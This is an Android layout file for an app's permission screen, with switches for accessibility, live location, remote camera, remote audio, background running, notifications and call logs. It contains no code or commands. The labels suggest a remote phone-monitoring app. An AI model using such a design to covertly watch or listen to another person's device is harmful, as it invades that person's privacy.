<?xml version="1.0" encoding="utf-8"?>
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    xmlns:tools="http://schemas.android.com/tools"
    android:id="@+id/main"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:scrollbars="none"
    tools:context=".activities.MainActivity">

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:padding="20dp"
        android:orientation="vertical">

        <RelativeLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content">

            <ImageView
                android:layout_width="@dimen/_100sdp"
                android:layout_height="140dp"
                android:padding="25dp"
                android:layout_centerInParent="true"
                android:src="@drawable/permission_management"/>

            <ImageView
                android:id="@+id/more_options_main"
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:src="@drawable/ic_round_more_vert"
                android:layout_alignParentEnd="true"
                android:layout_alignParentTop="true"
                android:clickable="true"
                android:focusable="true"
                android:background="?attr/selectableItemBackgroundBorderless"
                android:padding="5dp"/>

        </RelativeLayout>


        <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="Given Permissions are reuired to function this app correctly" />

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:background="@drawable/ll_bg"
            android:layout_marginTop="20dp"
            android:padding="5dp"
            android:orientation="vertical">

            <LinearLayout
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:orientation="horizontal"
                tools:ignore="UseCompoundDrawables">

                <ImageView
                    android:layout_width="40dp"
                    android:layout_height="40dp"
                    android:src="@drawable/shield_icon"
                    android:padding="11dp"/>

                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:text="Usage Setting"
                    android:textSize="15sp"
                    android:layout_gravity="center"
                    android:padding="5dp"/>

            </LinearLayout>

            <TextView
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="Accessibility Permission is start the service remotely"
                android:textSize="12sp"
                android:paddingStart="10dp"/>

            <View
                android:layout_width="match_parent"
                android:layout_height="0.5dp"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"
                android:layout_marginTop="10dp"
                android:background="#AFAFAF"/>

            <com.google.android.material.switchmaterial.SwitchMaterial
                android:id="@+id/switch_accessibility_permission"
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:text="Accessibility Permission"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"/>

        </LinearLayout>

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:background="@drawable/ll_bg"
            android:layout_marginTop="20dp"
            android:padding="5dp"
            android:orientation="vertical">

            <LinearLayout
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:orientation="horizontal"
                tools:ignore="UseCompoundDrawables">

                <ImageView
                    android:layout_width="40dp"
                    android:layout_height="40dp"
                    android:src="@drawable/location"
                    android:padding="10dp"/>

                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:text="Live Location"
                    android:textSize="15sp"
                    android:layout_gravity="center"
                    android:padding="5dp"/>

            </LinearLayout>

            <TextView
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="Location Permission is required to track real-time location"
                android:textSize="12sp"
                android:paddingStart="10dp"/>

            <View
                android:layout_width="match_parent"
                android:layout_height="0.5dp"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"
                android:layout_marginTop="10dp"
                android:background="#AFAFAF"/>

            <com.google.android.material.switchmaterial.SwitchMaterial
                android:id="@+id/switch_location_permission"
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:text="Location Permission"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"/>

        </LinearLayout>

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:background="@drawable/ll_bg"
        android:layout_marginTop="20dp"
        android:padding="5dp"
        android:orientation="vertical">

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:orientation="horizontal"
            tools:ignore="UseCompoundDrawables">

        <ImageView
            android:layout_width="40dp"
            android:layout_height="40dp"
            android:src="@drawable/remote_camera"
            android:padding="11dp"/>

        <TextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="Remote Camera"
            android:textSize="15sp"
            android:layout_gravity="center"
            android:padding="5dp"/>

        </LinearLayout>

        <TextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="Camera Permission is required to view the surroundings"
            android:textSize="12sp"
            android:paddingStart="10dp"/>

        <View
            android:layout_width="match_parent"
            android:layout_height="0.5dp"
            android:layout_marginStart="10dp"
            android:layout_marginEnd="10dp"
            android:layout_marginTop="10dp"
            android:background="#383738"/>

        <com.google.android.material.switchmaterial.SwitchMaterial
            android:id="@+id/switch_camera_permission"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="Camera Permission"
            android:layout_marginStart="10dp"
            android:layout_marginEnd="10dp"/>

    </LinearLayout>

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:background="@drawable/ll_bg"
        android:layout_marginTop="20dp"
        android:padding="5dp"
        android:orientation="vertical">

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:orientation="horizontal"
            tools:ignore="UseCompoundDrawables">

            <ImageView
                android:layout_width="40dp"
                android:layout_height="40dp"
                android:src="@drawable/microphone"
                android:padding="11dp"/>

            <TextView
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="Remote Audio"
                android:textSize="15sp"
                android:layout_gravity="center"
                android:padding="5dp"/>

        </LinearLayout>

        <TextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="Microphone Permission is required to listen to the surroundings"
            android:textSize="12sp"
            android:paddingStart="10dp"/>

        <View
            android:layout_width="match_parent"
            android:layout_height="0.5dp"
            android:layout_marginStart="10dp"
            android:layout_marginEnd="10dp"
            android:layout_marginTop="10dp"
            android:background="#AFAFAF"/>

        <com.google.android.material.switchmaterial.SwitchMaterial
            android:id="@+id/switch_microphone_permission"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="Microphone Permission"
            android:layout_marginStart="10dp"
            android:layout_marginEnd="10dp"/>

    </LinearLayout>

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:background="@drawable/ll_bg"
        android:layout_marginTop="20dp"
        android:padding="5dp"
        android:orientation="vertical">

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:orientation="horizontal"
            tools:ignore="UseCompoundDrawables">

            <ImageView
                android:layout_width="40dp"
                android:layout_height="40dp"
                android:src="@drawable/background_process"
                android:padding="11dp"/>

            <TextView
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="Keep running in the background"
                android:textSize="15sp"
                android:layout_gravity="center"
                android:padding="5dp"/>

        </LinearLayout>

        <TextView
            android:layout_width="wrap_content"
            android:layout_height="wrap_content"
            android:text="Permission required to keep running the app in background"
            android:textSize="13sp"
            android:paddingStart="10dp"/>

        <View
            android:layout_width="match_parent"
            android:layout_height="0.5dp"
            android:layout_marginStart="10dp"
            android:layout_marginEnd="10dp"
            android:layout_marginTop="10dp"
            android:background="#AFAFAF"/>

        <com.google.android.material.switchmaterial.SwitchMaterial
            android:id="@+id/switch_ignore_battery_optimization"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="Ignore Battery Optimization"
            android:layout_marginStart="10dp"
            android:layout_marginEnd="10dp"/>

    </LinearLayout>

        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:background="@drawable/ll_bg"
            android:layout_marginTop="20dp"
            android:padding="5dp"
            android:orientation="vertical">

            <LinearLayout
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:orientation="horizontal"
                tools:ignore="UseCompoundDrawables">

                <ImageView
                    android:layout_width="40dp"
                    android:layout_height="40dp"
                    android:src="@drawable/ic_notification"
                    android:padding="11dp"/>

                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="wrap_content"
                    android:text="Notification and call logs"
                    android:textSize="15sp"
                    android:layout_gravity="center"
                    android:padding="5dp"/>

            </LinearLayout>

            <TextView
                android:layout_width="wrap_content"
                android:layout_height="wrap_content"
                android:text="Notification access permission is required to view notification"
                android:textSize="13sp"
                android:paddingStart="10dp"/>

            <View
                android:layout_width="match_parent"
                android:layout_height="0.5dp"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"
                android:layout_marginTop="10dp"
                android:background="#AFAFAF"/>

            <com.google.android.material.switchmaterial.SwitchMaterial
                android:id="@+id/switch_notification_access_permission"
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:text="Notification Access Permission"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"/>

            <com.google.android.material.switchmaterial.SwitchMaterial
                android:id="@+id/switch_call_logs_permission"
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:text="Call Logs Permission"
                android:layout_marginStart="10dp"
                android:layout_marginEnd="10dp"/>

        </LinearLayout>

    </LinearLayout>

</ScrollView>